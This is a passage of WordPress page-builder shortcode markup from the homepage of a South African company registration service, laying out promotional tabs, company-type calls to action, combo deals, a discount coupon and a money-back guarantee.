et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|51px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"-12px||-13px|||\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-24px||-13px|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" min_height=\"56px\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#000000\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" 